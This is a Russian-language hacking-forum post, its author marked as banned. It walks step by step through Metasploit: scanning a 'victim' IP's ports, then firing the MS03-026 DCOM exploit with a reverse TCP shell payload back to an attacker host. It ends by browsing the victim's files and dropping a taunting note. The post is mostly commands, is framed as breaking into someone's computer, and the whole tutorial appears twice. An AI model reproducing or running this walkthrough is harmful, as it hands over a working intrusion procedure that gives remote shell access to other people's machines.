Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Салом Кулхацкер! И так опрос был пройден.И теперь я буду выпускать только свои авторские статьи.Поэтому это моя вторая авторская статья.Надеюсь вам понравится.
И так сегодня у нас пойдет речь о Кибербезопасности.Ведь чтобы просканировать устройство на уязвимости.Для этого не обязательно знать все эксплоиты.
Сегодня мы будем использовать Metasploit.Ни все знают одну фишку метасплоита.И попытаемся не только просканировать устройство.Но и взломать его.У нас же как сказать канал про Хакеров.Совместим полезное с приятным.
Ну что ж приступим.
Можно такие действия повторять что и в linux что и в termux
Разницы нет
В kali , parrot , black arch он уже встроен.Чтобы его запустить просто пропишем команду :
msfconsole
В Termux нужно устанавливать
Для начала установим metasploit
apt update
apt install unstable-repo
apt install metasploit
Команда запуска:
msfconsole
Все мы запустили Metasploit
Теперь мы пишем команду
db_status
для проверки состояния базы данных метасплоита.
Если у вас Connected
Как на скриншоте
Значит все в порядке.
Пропишем команду для старта пользования
git init
use auxiliary/scanner/portscan/tcp -Команда для сканирования открытых портов.
set PORTS 1-5000 - количество открытых портов .От 1 до 5000
set RHOSTS 192.168.88.161 - Вводим IP жертвы
run - команда запуска
search dcom - работа с эксплоитами dcom
У нас появляется вот такая панель.С эксплоитами.Выбираем тот эксплоит на котором написано No и ранг эксплоита great.Который подходит для взлома.Можно конечно выбрать любой.Но врятли он будет подходить для взлома.В данном случае я буду использовать эксплоит exploit/windows/dcerpc/ms03_026_dcom
Для этого пропишем команду
use exploit/windows/dcerpc/ms03_026_dcom
set payload windows/shell_reverse_tcp - команда для создания полезной нагрузки самая часто используемая для взлома.
show options - Команда для проверки того что нам нужно заполнить перед началом запуска эксплоита
Как мы видем у нас здесь не заполнено поле IP жертвы и IP злоумышленника
set RHOSTS 192.168.88.161 (IP той машины, которую будем проверять на защищенность)
set LHOST 192.168.88.247 - IP злоумышленника
run - команда запуска эксплоита.Если не работает пишем команду exploit
cd ..\..\ - команда для перехода в директорию файлов
Я прописал команду dir
Чтобы получить доступ ко всем файлам жертвы
Прописывая следующую команду мы можем создать текстовый файл.И послать жертве письмо
echo Hello! (кнопка стрелки на Ю) achtung.x
Ну вот и все ребят.Мы выполнили взлом жертвы Компьютера.За одно и просканировали на уязвимости.Как говорится полезное с приятным.
Ну а с вами был ФБР!Надеюсь вам понравились мои авторские статьи.
Буду писать еще.До скорых встреч!
И так сегодня у нас пойдет речь о Кибербезопасности.Ведь чтобы просканировать устройство на уязвимости.Для этого не обязательно знать все эксплоиты.
Сегодня мы будем использовать Metasploit.Ни все знают одну фишку метасплоита.И попытаемся не только просканировать устройство.Но и взломать его.У нас же как сказать канал про Хакеров.Совместим полезное с приятным.
Ну что ж приступим.
Можно такие действия повторять что и в linux что и в termux
Разницы нет
В kali , parrot , black arch он уже встроен.Чтобы его запустить просто пропишем команду :
msfconsole
В Termux нужно устанавливать
Для начала установим metasploit
apt update
apt install unstable-repo
apt install metasploit
Команда запуска:
msfconsole
Все мы запустили Metasploit
Теперь мы пишем команду
db_status
для проверки состояния базы данных метасплоита.
Если у вас Connected
Как на скриншоте
Значит все в порядке.
Пропишем команду для старта пользования
git init
use auxiliary/scanner/portscan/tcp -Команда для сканирования открытых портов.
set PORTS 1-5000 - количество открытых портов .От 1 до 5000
set RHOSTS 192.168.88.161 - Вводим IP жертвы
run - команда запуска
search dcom - работа с эксплоитами dcom
У нас появляется вот такая панель.С эксплоитами.Выбираем тот эксплоит на котором написано No и ранг эксплоита great.Который подходит для взлома.Можно конечно выбрать любой.Но врятли он будет подходить для взлома.В данном случае я буду использовать эксплоит exploit/windows/dcerpc/ms03_026_dcom
Для этого пропишем команду
use exploit/windows/dcerpc/ms03_026_dcom
set payload windows/shell_reverse_tcp - команда для создания полезной нагрузки самая часто используемая для взлома.
show options - Команда для проверки того что нам нужно заполнить перед началом запуска эксплоита
Как мы видем у нас здесь не заполнено поле IP жертвы и IP злоумышленника
set RHOSTS 192.168.88.161 (IP той машины, которую будем проверять на защищенность)
set LHOST 192.168.88.247 - IP злоумышленника
run - команда запуска эксплоита.Если не работает пишем команду exploit
cd ..\..\ - команда для перехода в директорию файлов
Я прописал команду dir
Чтобы получить доступ ко всем файлам жертвы
Прописывая следующую команду мы можем создать текстовый файл.И послать жертве письмо
echo Hello! (кнопка стрелки на Ю) achtung.x
Ну вот и все ребят.Мы выполнили взлом жертвы Компьютера.За одно и просканировали на уязвимости.Как говорится полезное с приятным.
Ну а с вами был ФБР!Надеюсь вам понравились мои авторские статьи.
Буду писать еще.До скорых встреч!
Последнее редактирование модератором: